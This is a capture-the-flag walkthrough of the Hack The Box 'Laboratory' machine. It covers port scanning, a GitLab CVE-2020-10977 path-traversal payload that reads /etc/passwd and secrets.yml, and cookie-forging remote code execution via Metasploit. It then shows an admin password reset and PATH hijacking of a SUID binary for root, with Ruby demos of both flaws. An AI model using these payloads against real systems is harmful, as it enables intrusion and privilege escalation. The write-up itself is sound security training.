HTB::Laboratory

Lab environment

[image: info]

Penetration process

0x01 Information gathering

Fast full-range port scan with masscan:

    masscan -p1-65535 10.10.10.216 --rate=1000
    Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-04-17 08:10:08 GMT
    Initiating SYN Stealth Scan
    Scanning 1 hosts [65535 ports/host]
    Discovered open port 80/tcp on 10.10.10.216
    Discovered open port 22/tcp on 10.10.10.216
    Discovered open port 443/tcp on 10.10.10.216
    

Ports 22, 80 and 443 are open.

Service and script scan of just those ports with nmap ($ports holds the comma-separated list from the masscan result, 22,80,443):

    nmap -sC -sV -p$ports --min-rate=100 10.10.10.216
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 16:13 CST
    Nmap scan report for laboratory.htb (10.10.10.216)
    Host is up (0.57s latency).
    
    PORT    STATE SERVICE  VERSION
    22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
    |   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
    |_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
    80/tcp  open  http     Apache httpd 2.4.41
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Did not follow redirect to https://laboratory.htb/
    443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: The Laboratory
    | ssl-cert: Subject: commonName=laboratory.htb
    | Subject Alternative Name: DNS:git.laboratory.htb
    | Not valid before: 2020-07-05T10:39:28
    |_Not valid after:  2024-03-03T10:39:28
    | tls-alpn:
    |_  http/1.1
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 53.19 seconds
    

Port 443 serves two sites, named in the certificate's CN and SAN: https://laboratory.htb and https://git.laboratory.htb (both names have to be added to /etc/hosts so the right virtual host is served).

whatweb:

[image: whatweb]

0x02 Exploitation

    CVE-2020-10977

The default site is a static page. On git.laboratory.htb, register a GitLab account with an @laboratory.htb e-mail address and log in:

[image: gitlab]

This gives the GitLab version; searching for vulnerabilities affecting it:

[image: gitlabrce]

There is a HackerOne report analysing this vulnerability. CVE-2020-10977 is a path traversal in the markdown UploadsRewriter that GitLab runs when an issue is moved between projects: the secret part of an upload link is validated, but the file part is not, so any file readable by the git user can be copied into the target project as an attachment:

[image: HackerOne]

Exploitation steps:

    ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
    

Create an arbitrary new project (test), open an issue in it and paste the payload above into the issue body:

[image: issue]

Then create a second project, test1, and move the issue into it. The rewriter copies the "attachment" across, and the file can now be downloaded from the moved issue:

[image: file]

Retrieved passwd:

[image: passwd]
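The mechanism behind the payload, as an added Ruby example that is neither GitLab's code nor part of the original post: a simplified model of the rewriter that runs when an issue is moved. The regex only constrains the 32-hex secret, so the file part may contain ../; the path is collapsed lexically with File.expand_path, which is why the secret directory 11111... never has to exist; and whatever the path points at is copied into the target project. The validate: true variant adds the check a fix needs. The directory layout, class and method names are assumptions for the demo.

```ruby
require 'fileutils'
require 'securerandom'
require 'tmpdir'

# Upload link as GitLab writes it into markdown: ![alt](/uploads/<32-hex secret>/<file>).
# Only the secret is constrained; the file part is free text, so it may contain "..".
MARKDOWN_PATTERN = %r{!?\[(?<alt>.*?)\]\(/uploads/(?<secret>[0-9a-f]{32})/(?<file>[^)]+)\)}

# Simplified stand-in for the rewriter GitLab runs when an issue is moved
# (illustrative, not GitLab's code). On-disk layout assumed here:
#   <uploads_root>/<project>/<secret>/<file>
class UploadsRewriter
  def initialize(uploads_root, source_project, target_project, validate:)
    @source_dir = File.join(uploads_root, source_project)
    @target_dir = File.join(uploads_root, target_project)
    @validate = validate
  end

  # Copies every referenced upload into the target project under a fresh
  # secret and rewrites the link; links whose file cannot be resolved are kept.
  def rewrite(text)
    text.gsub(MARKDOWN_PATTERN) do
      m = Regexp.last_match
      path = resolve(m[:secret], m[:file])
      next m[0] if path.nil? || !File.file?(path)

      new_secret = SecureRandom.hex(16)
      new_name = File.basename(m[:file])
      dest = File.join(@target_dir, new_secret, new_name)
      FileUtils.mkdir_p(File.dirname(dest))
      FileUtils.cp(path, dest) # the "attachment" now downloadable from the moved issue
      "![#{m[:alt]}](/uploads/#{new_secret}/#{new_name})"
    end
  end

  private

  # expand_path collapses ".." lexically, so "<secret>/../../../etc/passwd" becomes
  # /etc/passwd even though the <secret> directory never existed.
  def resolve(secret, file)
    path = File.expand_path(File.join(@source_dir, secret, file))
    return path unless @validate

    # Hardened: accept only files that really live under this project's uploads dir.
    path.start_with?(File.expand_path(@source_dir) + File::SEPARATOR) ? path : nil
  end
end

# Constructed demo tree (no real GitLab involved):
#   <root>/config/secrets.yml              <- target outside the uploads tree
#   <root>/uploads/test/<secret>/image.png <- a legitimate attachment
#   <root>/uploads/test1/                  <- the project the issue is moved to
def demo
  Dir.mktmpdir do |root|
    uploads = File.join(root, 'uploads')
    FileUtils.mkdir_p(File.join(root, 'config'))
    File.write(File.join(root, 'config', 'secrets.yml'), "secret_key_base: deadbeef\n")
    legit_secret = 'a' * 32
    FileUtils.mkdir_p(File.join(uploads, 'test', legit_secret))
    File.write(File.join(uploads, 'test', legit_secret, 'image.png'), 'PNG')
    FileUtils.mkdir_p(File.join(uploads, 'test1'))

    # Three ".." climb from <uploads>/test/<secret>/ to <root>; the real payload
    # just uses enough of them to reach "/" before etc/passwd.
    traversal = "![a](/uploads/#{'1' * 32}/../../../config/secrets.yml)"
    legit = "![pic](/uploads/#{legit_secret}/image.png)"
    issue_text = "#{traversal}\n#{legit}"

    vulnerable = UploadsRewriter.new(uploads, 'test', 'test1', validate: false).rewrite(issue_text)
    leaked = Dir.glob(File.join(uploads, 'test1', '*', 'secrets.yml')).first
    hardened = UploadsRewriter.new(uploads, 'test', 'test1', validate: true).rewrite(issue_text)

    {
      traversal_link: traversal,
      vulnerable_output: vulnerable,
      leaked_contents: leaked && File.read(leaked),
      hardened_output: hardened
    }
  end
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

Running it shows the vulnerable pass copying secrets.yml into project test1 and rewriting the traversal link, while the hardened pass leaves that link untouched and still rewrites the legitimate image.png upload, so the check does not break normal attachments.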

RCE: the same file read fetches /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml. Its secret_key_base is what signs Rails cookies, so a forged experimentation_subject_id cookie carrying a Marshal deserialization gadget is accepted and executes code as the git user (the chain described in the HackerOne report):

[image: RCE]

Exploiting it with Metasploit, whose exploit/multi/http/gitlab_file_read_rce module automates the file read, the cookie forging and the shell:

[image: msfinfo]

A reverse shell comes back:

[image: rshell]

    user.txt

The shell runs as the git user, the account GitLab itself runs under, so the GitLab administrator's password can be reset from gitlab-rails console:

[image: dexter]

Logging in as the administrator succeeds, and a user's SSH private key is found in the backend:

[image: id_rsa]

Copy it locally and log in over SSH with it:

[image: user.txt]

    root.txt

A todo file is found; it suggests docker can be used for privilege escalation:

[image: todo]

Running a privilege-escalation enumeration script:

[image: privesc helper]

docker-security turns out to be a SUID binary. ltrace traces the library calls the process makes (note that a SUID binary run under ltrace as an unprivileged user loses its elevated privileges, so the calls are visible even though they fail):

[image: ltrace]

It performs two chmod calls.

It runs chmod without specifying the full path /usr/bin/chmod, so it can be exploited by PATH hijacking.

If you are not familiar with PATH hijacking, read this article:

Linux Privilege Escalation Using PATH Variable

Because chmod is invoked by bare name rather than as /usr/bin/chmod, the lookup goes through the caller's PATH. Plant our own chmod (a script that gives us a root shell) in a directory we can write to, prepend that directory to PATH and run the SUID binary: it executes our chmod with root privileges:

[image: privesc]
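The ltrace finding in working form, as an added Ruby example that is not the docker-security binary (its source is not on the page): insecure_fix_perms shells out to chmod by bare name the way the SUID helper does, the demo plants a fake chmod, prepends its directory to PATH (the export PATH=/tmp:$PATH step of the exploit) and shows the planted script runs instead of the real chmod, while the hardened variant, which pins PATH for the child, runs the real one. The function names, the marker file and the trusted PATH value are assumptions; the demo runs unprivileged, so the fake only records that it ran, whereas under a real SUID-root binary it would run as root.

```ruby
require 'fileutils'
require 'tmpdir'

# Stand-in for a SUID helper that runs "chmod" by bare name, as the ltrace output
# shows docker-security doing (hypothetical code; the binary's source is not on the page).
# Ruby's system() with separate arguments does the same PATH search as execvp(),
# and a C system("chmod 700 ...") goes through /bin/sh, which searches PATH too.
def insecure_fix_perms(target)
  system('chmod', '700', target)
end

# Hardened variant: the child gets a fixed, trusted PATH, so a directory the
# caller controls is never searched. Calling /usr/bin/chmod by absolute path or
# dropping the elevated privileges before spawning are the other usual fixes.
def hardened_fix_perms(target)
  system({ 'PATH' => '/usr/bin:/bin' }, 'chmod', '700', target)
end

# Plants a fake chmod, prepends its directory to PATH, calls both helpers and
# reports which one ran the fake. Under a real SUID-root binary the fake would
# execute as root (for example "chmod u+s /bin/bash" or spawning a shell).
def demo
  Dir.mktmpdir do |dir|
    fake_bin = File.join(dir, 'bin')
    FileUtils.mkdir_p(fake_bin)
    marker = File.join(dir, 'hijacked') # written by the fake chmod when it runs
    fake_chmod = File.join(fake_bin, 'chmod')
    File.write(fake_chmod, "#!/bin/sh\necho \"fake chmod ran as uid $(id -u): $*\" >> '#{marker}'\n")
    File.chmod(0o755, fake_chmod)

    target = File.join(dir, 'victim') # file the helper is supposed to chmod 700
    File.write(target, '')
    File.chmod(0o644, target)

    saved_path = ENV['PATH']
    ENV['PATH'] = "#{fake_bin}:#{saved_path}" # the attacker's export PATH=/tmp:$PATH
    begin
      insecure_fix_perms(target)
      insecure_ran_fake = File.exist?(marker)
      insecure_mode = File.stat(target).mode & 0o777 # still 0644: real chmod never ran
      File.delete(marker) if insecure_ran_fake

      hardened_fix_perms(target)
      hardened_ran_fake = File.exist?(marker)
      hardened_mode = File.stat(target).mode & 0o777 # 0700: the real chmod ran
    ensure
      ENV['PATH'] = saved_path
    end

    { insecure_ran_fake: insecure_ran_fake, insecure_mode: insecure_mode,
      hardened_ran_fake: hardened_ran_fake, hardened_mode: hardened_mode }
  end
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

The same resolution rule is what makes the attack work against the real binary: the SUID process inherits the caller's environment, and nothing in the binary resets PATH before it spawns chmod.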

root.txt obtained.

    Reference

    CVE-2020-10977

Path hijacking

Original article: https://www.cnblogs.com/chalan630/p/14705167.html